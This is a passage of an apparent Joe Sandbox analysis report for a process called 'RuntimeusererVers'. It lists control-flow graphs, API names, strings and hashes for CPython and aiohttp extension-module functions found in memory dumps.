7ff81ec81421-7ff81ec81424 _Py_Dealloc 4525->4527 4526->4491 4528 7ff81ec811cb-7ff81ec811e5 PyDict_SetItemString 4526->4528 4527->4487 4528->4491 4529 7ff81ec811eb-7ff81ec81205 PyDict_SetItemString 4528->4529 4529->4491 4530 7ff81ec8120b-7ff81ec81225 PyDict_SetItemString 4529->4530 4530->4491 4531 7ff81ec8122b-7ff81ec81245 PyDict_SetItemString 4530->4531 4531->4491 4532 7ff81ec8124b-7ff81ec81265 PyDict_SetItemString 4531->4532 4532->4491 4533 7ff81ec8126b-7ff81ec81285 PyDict_SetItemString 4532->4533 4533->4491 4534 7ff81ec8128b-7ff81ec812a5 PyDict_SetItemString 4533->4534 4534->4491 4535 7ff81ec812ab-7ff81ec812c6 PyUnicode_AsUTF8AndSize 4534->4535 4535->4491 4536 7ff81ec812cc-7ff81ec812df PyUnicode_AsUTF8AndSize 4535->4536 4536->4491 4537 7ff81ec812e5-7ff81ec81300 PyCode_NewEmpty 4536->4537 4537->4491 4538 7ff81ec81302-7ff81ec81318 PyObject_GetAttrString 4537->4538 4539 7ff81ec8131a-7ff81ec81328 PyTuple_New 4538->4539 4540 7ff81ec81357-7ff81ec8135b 4538->4540 4539->4540 4543 7ff81ec8132a-7ff81ec8133f PyObject_Call 4539->4543 4541 7ff81ec8135d-7ff81ec81360 _Py_Dealloc 4540->4541 4542 7ff81ec81366 4540->4542 4541->4542 4542->4491 4543->4540 4544 7ff81ec81341-7ff81ec81345 4543->4544 4545 7ff81ec81347-7ff81ec8134a _Py_Dealloc 4544->4545 4546 7ff81ec81350-7ff81ec81355 4544->4546 4545->4546 4546->4491
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_String$Item$Dealloc$FromLongLong_$Err_Object_SizeUnicode_$AttrCallCode_EmptyFetchRestoreTuple_
                                                                                                                                                                                                                                          • String ID: co_argcount$co_cellvars$co_code$co_consts$co_flags$co_freevars$co_kwonlyargcount$co_linetable$co_names$co_nlocals$co_posonlyargcount$co_stacksize$co_varnames$replace
                                                                                                                                                                                                                                          • API String ID: 1955960856-725626598
                                                                                                                                                                                                                                          • Opcode ID: 9b4c5091d6dbb928d75647d897477b2ea03d0a8c094ce9afa023fe9ceddbb55b
                                                                                                                                                                                                                                          • Instruction ID: 52dd7e2d59c9dd8faeb40e6137f13a9d6ea70c6e952a5c39dbf900dcb11890fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b4c5091d6dbb928d75647d897477b2ea03d0a8c094ce9afa023fe9ceddbb55b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05C1D821A2DF4281EB648B22AE44A7973E5BF96BF0F455239CD4D46B64EF2CF845D300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: d2fc5c816bc886ec48474e1f3de92b9dad2b167a0f664e979cdb826d70fdf180
                                                                                                                                                                                                                                          • Instruction ID: 34d6e585c5e28f055041220e219bab04718132e7e7f9d0a95d38359700cd77c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2fc5c816bc886ec48474e1f3de92b9dad2b167a0f664e979cdb826d70fdf180
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73315E72619F818AEB648F60F8403EE73A1FB88794F44453ADA4D47B94DF38E548C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: 39c032ac710924fa7783a0340ae9420989a28a62c06058e897b4d705c1daebf8
                                                                                                                                                                                                                                          • Instruction ID: 7bf4b94a250b1479f7e0d29fe6aaf705f4378486b584241d497132c7a969f25c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c032ac710924fa7783a0340ae9420989a28a62c06058e897b4d705c1daebf8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46316D72719F8585EB608F64E8543ED73A0FB94794F404139DA4E47B98DF38E648C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638872780.00007FF81EC70000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638949902.00007FF81EC72000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639016964.00007FF81EC73000.00000004.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639056414.00007FF81EC74000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: 7af6d3e7f7e34c059537e11f5101d55855401e4335d46a65a440c931bdec65b4
                                                                                                                                                                                                                                          • Instruction ID: 6e370d77694b1d53188ac4b8674637ae6faf9956e24583a9f66ca47210894704
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af6d3e7f7e34c059537e11f5101d55855401e4335d46a65a440c931bdec65b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64313072A19F8189EB649F60E8803ED73A2FB84794F444539DA8E87B94DF3CE548C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: f18bf372630c86763d454d088a2fed133c01a6f09859efe0fe258df821aca2f5
                                                                                                                                                                                                                                          • Instruction ID: 02c35391761fa5618f9fbbdcbc1e104271853fa3fb3d47bdcf156876286c9e20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f18bf372630c86763d454d088a2fed133c01a6f09859efe0fe258df821aca2f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82314C72619E8186EB608F64E950BEE7360FB84794F44453ADA4E47B94EF3CE648C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$freemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2494952999-0
                                                                                                                                                                                                                                          • Opcode ID: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction ID: 366a2d8b5bb215a0359171033098131fb6aff231d0b64731b29152ec616bab9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45328E33A05F8186E754CF25D5407AA33A4FB58BA8F088339DB5D0B795EF39A1A4C720

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4547 7ff81ec818e0-7ff81ec81909 PyThreadState_Get PyInterpreterState_GetID 4548 7ff81ec8190b-7ff81ec8191f 4547->4548 4549 7ff81ec81938-7ff81ec8193b 4547->4549 4550 7ff81ec81954-7ff81ec8195d 4548->4550 4551 7ff81ec81921-7ff81ec8192b 4548->4551 4549->4551 4552 7ff81ec8193d-7ff81ec8194e PyErr_SetString 4549->4552 4553 7ff81ec8195e-7ff81ec81988 PyObject_GetAttrString 4551->4553 4554 7ff81ec8192d-7ff81ec81937 4551->4554 4552->4550 4555 7ff81ec8198e-7ff81ec8199e PyModule_NewObject 4553->4555 4556 7ff81ec81a10 4553->4556 4558 7ff81ec819a9-7ff81ec819ac 4555->4558 4559 7ff81ec819a0-7ff81ec819a3 _Py_Dealloc 4555->4559 4557 7ff81ec81a12-7ff81ec81a2d 4556->4557 4558->4556 4560 7ff81ec819ae-7ff81ec819bd PyModule_GetDict 4558->4560 4559->4558 4561 7ff81ec819bf-7ff81ec819d5 PyObject_GetAttrString 4560->4561 4562 7ff81ec81a01-7ff81ec81a05 4560->4562 4563 7ff81ec81a2e-7ff81ec81a40 PyErr_ExceptionMatches 4561->4563 4564 7ff81ec819d7-7ff81ec819f1 PyDict_SetItemString 4561->4564 4562->4556 4565 7ff81ec81a07-7ff81ec81a0a _Py_Dealloc 4562->4565 4563->4562 4568 7ff81ec81a42 PyErr_Clear 4563->4568 4566 7ff81ec819fc-7ff81ec819ff 4564->4566 4567 7ff81ec819f3-7ff81ec819f6 _Py_Dealloc 4564->4567 4565->4556 4566->4562 4569 7ff81ec81a48-7ff81ec81a5e PyObject_GetAttrString 4566->4569 4567->4566 4568->4569 4570 7ff81ec81a90-7ff81ec81aa2 PyErr_ExceptionMatches 4569->4570 4571 7ff81ec81a60-7ff81ec81a7a PyDict_SetItemString 4569->4571 4570->4562 4574 7ff81ec81aa8 PyErr_Clear 4570->4574 4572 7ff81ec81a7c-7ff81ec81a7f _Py_Dealloc 4571->4572 4573 7ff81ec81a85-7ff81ec81a88 4571->4573 4572->4573 4573->4562 4576 7ff81ec81a8e 4573->4576 4575 7ff81ec81aae-7ff81ec81ac4 PyObject_GetAttrString 4574->4575 4577 7ff81ec81af6-7ff81ec81b08 PyErr_ExceptionMatches 4575->4577 4578 7ff81ec81ac6-7ff81ec81ae0 PyDict_SetItemString 4575->4578 4576->4575 4577->4562 4581 7ff81ec81b0e PyErr_Clear 4577->4581 4579 7ff81ec81aeb-7ff81ec81aee 4578->4579 4580 7ff81ec81ae2-7ff81ec81ae5 _Py_Dealloc 4578->4580 4579->4562 4582 7ff81ec81af4 4579->4582 4580->4579 4583 7ff81ec81b14-7ff81ec81b2a PyObject_GetAttrString 4581->4583 4582->4583 4584 7ff81ec81b2c-7ff81ec81b33 4583->4584 4585 7ff81ec81b64-7ff81ec81b76 PyErr_ExceptionMatches 4583->4585 4586 7ff81ec81b4b-7ff81ec81b4f 4584->4586 4587 7ff81ec81b35-7ff81ec81b48 PyDict_SetItemString 4584->4587 4585->4562 4588 7ff81ec81b7c PyErr_Clear 4585->4588 4590 7ff81ec81b5a-7ff81ec81b5d 4586->4590 4591 7ff81ec81b51-7ff81ec81b54 _Py_Dealloc 4586->4591 4587->4586 4589 7ff81ec81b82-7ff81ec81b85 4588->4589 4589->4557 4590->4589 4592 7ff81ec81b5f 4590->4592 4591->4590 4592->4562
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Err_$Dealloc$AttrObject_$ClearDict_ExceptionItemMatches$Module_State_$DictInterpreterObjectThread
                                                                                                                                                                                                                                          • String ID: Interpreter change detected - this module can only be loaded into one interpreter per process.$__file__$__loader__$__package__$__path__$loader$name$origin$parent$submodule_search_locations
                                                                                                                                                                                                                                          • API String ID: 3851358283-2188512448
                                                                                                                                                                                                                                          • Opcode ID: edf545a8bd909d813673eacdee54f790ed7a13a4044ada9ee02670b7bac46855
                                                                                                                                                                                                                                          • Instruction ID: 2d961bbb615d829ad85d14f2c89efc49dc0b743ce5c7486a169e6dff0801065f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edf545a8bd909d813673eacdee54f790ed7a13a4044ada9ee02670b7bac46855
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB71E721A29E4381EB558F26EE549B9A3E0BF85BF5B095339CD1E473A4EF2DF4548300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4593 7ff81ec82840-7ff81ec82876 PyThreadState_Get 4594 7ff81ec8287c-7ff81ec82883 4593->4594 4595 7ff81ec829c4 4593->4595 4596 7ff81ec829bc-7ff81ec829c2 4594->4596 4597 7ff81ec82889-7ff81ec828b1 PyErr_Fetch _PyObject_GetDictPtr 4594->4597 4598 7ff81ec829c7-7ff81ec829ca 4595->4598 4596->4598 4599 7ff81ec828fd-7ff81ec82919 4597->4599 4600 7ff81ec828b3-7ff81ec828c1 4597->4600 4601 7ff81ec829cc-7ff81ec829d6 4598->4601 4602 7ff81ec82a04-7ff81ec82a1b PyErr_Fetch 4598->4602 4605 7ff81ec8291b-7ff81ec8291e 4599->4605 4606 7ff81ec82920 PyObject_GetAttr 4599->4606 4603 7ff81ec828cf-7ff81ec828fb _PyDict_GetItem_KnownHash 4600->4603 4604 7ff81ec828c3-7ff81ec828ca 4600->4604 4601->4602 4607 7ff81ec829d8-7ff81ec829ec call 7ff81ec827c0 4601->4607 4608 7ff81ec82a1d-7ff81ec82a3d PyUnicode_FromFormat 4602->4608 4609 7ff81ec82a61-7ff81ec82a76 PyCode_NewEmpty 4602->4609 4610 7ff81ec82958-7ff81ec8295b 4603->4610 4604->4610 4613 7ff81ec82926-7ff81ec8292c 4605->4613 4606->4613 4607->4602 4636 7ff81ec829ee-7ff81ec829f8 4607->4636 4615 7ff81ec82a3f-7ff81ec82a4e PyUnicode_AsUTF8 4608->4615 4616 7ff81ec82a8c-7ff81ec82a94 4608->4616 4611 7ff81ec82a78-7ff81ec82a7c 4609->4611 4612 7ff81ec82a87-7ff81ec82a8a 4609->4612 4626 7ff81ec8295d-7ff81ec82964 4610->4626 4627 7ff81ec82986-7ff81ec8299d PyObject_SetAttr 4610->4627 4611->4612 4618 7ff81ec82a7e-7ff81ec82a81 _Py_Dealloc 4611->4618 4612->4616 4619 7ff81ec82ad5-7ff81ec82aec PyErr_Restore 4612->4619 4623 7ff81ec8292e-7ff81ec8294d PyObject_Not 4613->4623 4624 7ff81ec82980 PyErr_Clear 4613->4624 4615->4609 4617 7ff81ec82a50-7ff81ec82a54 4615->4617 4621 7ff81ec82a96-7ff81ec82a9a 4616->4621 4622 7ff81ec82aa2-7ff81ec82aaa 4616->4622 4617->4616 4630 7ff81ec82a56-7ff81ec82a5f _Py_Dealloc 4617->4630 4618->4612 4628 7ff81ec82aee-7ff81ec82af0 4619->4628 4629 7ff81ec82af2 4619->4629 4621->4622 4632 7ff81ec82a9c _Py_Dealloc 4621->4632 4633 7ff81ec82aac-7ff81ec82ab0 4622->4633 4634 7ff81ec82ab8-7ff81ec82ac0 4622->4634 4623->4610 4635 7ff81ec8294f-7ff81ec82952 _Py_Dealloc 4623->4635 4624->4627 4637 7ff81ec8297c-7ff81ec8297e 4626->4637 4638 7ff81ec82966-7ff81ec8296d 4626->4638 4631 7ff81ec829a3-7ff81ec829ba PyErr_Restore 4627->4631 4639 7ff81ec82af5-7ff81ec82afe 4628->4639 4629->4639 4630->4616 4631->4595 4631->4596 4632->4622 4633->4634 4640 7ff81ec82ab2 _Py_Dealloc 4633->4640 4642 7ff81ec82ac6-7ff81ec82aca 4634->4642 4643 7ff81ec82c50-7ff81ec82c6d 4634->4643 4635->4610 4636->4602 4641 7ff81ec829fa-7ff81ec829ff 4636->4641 4637->4631 4638->4631 4644 7ff81ec8296f-7ff81ec8297a PyObject_Not 4638->4644 4645 7ff81ec82bfb-7ff81ec82c19 PyFrame_New 4639->4645 4646 7ff81ec82b04-7ff81ec82b07 4639->4646 4640->4634 4647 7ff81ec82bf8 4641->4647 4642->4643 4648 7ff81ec82ad0 4642->4648 4644->4631 4644->4637 4651 7ff81ec82c1b-7ff81ec82c22 PyTraceBack_Here 4645->4651 4652 7ff81ec82c28-7ff81ec82c2b 4645->4652 4649 7ff81ec82b09-7ff81ec82b17 PyMem_Malloc 4646->4649 4650 7ff81ec82b43-7ff81ec82b5b call 7ff81ec827c0 4646->4650 4647->4645 4653 7ff81ec82c4a _Py_Dealloc 4648->4653 4649->4645 4654 7ff81ec82b1d-7ff81ec82b3e 4649->4654 4661 7ff81ec82b5d-7ff81ec82b67 4650->4661 4662 7ff81ec82b86-7ff81ec82b8e 4650->4662 4651->4652 4656 7ff81ec82c2d-7ff81ec82c31 4652->4656 4657 7ff81ec82c3c-7ff81ec82c3f 4652->4657 4653->4643 4654->4647 4656->4657 4659 7ff81ec82c33-7ff81ec82c36 _Py_Dealloc 4656->4659 4657->4643 4660 7ff81ec82c41-7ff81ec82c45 4657->4660 4659->4657 4660->4643 4663 7ff81ec82c47 4660->4663 4661->4662 4664 7ff81ec82b69-7ff81ec82b75 4661->4664 4665 7ff81ec82bbe-7ff81ec82bc4 4662->4665 4666 7ff81ec82b90-7ff81ec82ba9 PyMem_Realloc 4662->4666 4663->4653 4664->4645 4669 7ff81ec82b7b-7ff81ec82b81 _Py_Dealloc 4664->4669 4667 7ff81ec82bc6-7ff81ec82bcd 4665->4667 4668 7ff81ec82be4-7ff81ec82bf4 4665->4668 4666->4645 4670 7ff81ec82bab-7ff81ec82bb7 4666->4670 4671 7ff81ec82bd0-7ff81ec82be2 4667->4671 4668->4647 4669->4645 4670->4665 4671->4668 4671->4671
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Object_$FetchMem_RestoreUnicode_$AttrBack_ClearCode_DictDict_EmptyFormatFrame_FromHashHereItem_KnownMallocReallocState_ThreadTrace
                                                                                                                                                                                                                                          • String ID: %s (%s:%d)$aiohttp/_websocket.c
                                                                                                                                                                                                                                          • API String ID: 1693070688-3693723348
                                                                                                                                                                                                                                          • Opcode ID: 7f127098a0996deedaa68888af9cbb0043e995f9c4181e27990d48dd31f065a1
                                                                                                                                                                                                                                          • Instruction ID: afb329ae19271f6b5dca43b4b95b53c9b30439398b2cfe5a616c9646566fb631
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f127098a0996deedaa68888af9cbb0043e995f9c4181e27990d48dd31f065a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC12621A29E5281EB688F15AE489B8A3A6FF94FF4F094239D94E07764DF3CF4518300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4672 7ff81ec5210c-7ff81ec52130 4673 7ff81ec52139-7ff81ec52140 4672->4673 4674 7ff81ec52132-7ff81ec52134 4672->4674 4676 7ff81ec52146-7ff81ec5215c _PyTime_FromSecondsObject 4673->4676 4677 7ff81ec521d1 4673->4677 4675 7ff81ec521d8-7ff81ec521e4 4674->4675 4680 7ff81ec521ea-7ff81ec521fd PyThread_acquire_lock_timed 4675->4680 4681 7ff81ec52283-7ff81ec52292 call 7ff81ec52720 4675->4681 4678 7ff81ec5215e-7ff81ec52166 4676->4678 4679 7ff81ec5217f-7ff81ec52181 4676->4679 4677->4675 4682 7ff81ec52168-7ff81ec52179 PyErr_SetString 4678->4682 4683 7ff81ec52186-7ff81ec521a1 _PyTime_AsMicroseconds 4678->4683 4684 7ff81ec522a8-7ff81ec522c0 4679->4684 4686 7ff81ec5222d-7ff81ec52230 4680->4686 4687 7ff81ec521ff-7ff81ec52202 4680->4687 4697 7ff81ec52294-7ff81ec5229e PyThread_release_lock 4681->4697 4698 7ff81ec522a5 4681->4698 4682->4679 4692 7ff81ec521c1-7ff81ec521cf _PyDeadline_Init 4683->4692 4693 7ff81ec521a3-7ff81ec521bc PyErr_SetString 4683->4693 4690 7ff81ec52242-7ff81ec52244 4686->4690 4691 7ff81ec52232-7ff81ec5223a Py_MakePendingCalls 4686->4691 4688 7ff81ec52208-7ff81ec52227 PyEval_SaveThread PyThread_acquire_lock_timed PyEval_RestoreThread 4687->4688 4689 7ff81ec522c1-7ff81ec522da PyType_GetModule PyErr_SetNone 4687->4689 4688->4686 4689->4684 4690->4689 4696 7ff81ec52246-7ff81ec52250 4690->4696 4691->4679 4695 7ff81ec52240 4691->4695 4692->4675 4693->4684 4695->4696 4699 7ff81ec52271-7ff81ec5227d 4696->4699 4700 7ff81ec52252-7ff81ec5226e _PyDeadline_Get _PyTime_AsMicroseconds 4696->4700 4697->4698 4698->4684 4699->4680 4699->4681 4700->4699
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Eval_ThreadThread_acquire_lock_timedTime_$CallsDeadline_FromMakeMicrosecondsModuleNoneObjectPendingRestoreSaveSecondsStringThread_release_lockType_
                                                                                                                                                                                                                                          • String ID: 'timeout' must be a non-negative number$timeout value is too large
                                                                                                                                                                                                                                          • API String ID: 1143863106-4256478105
                                                                                                                                                                                                                                          • Opcode ID: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
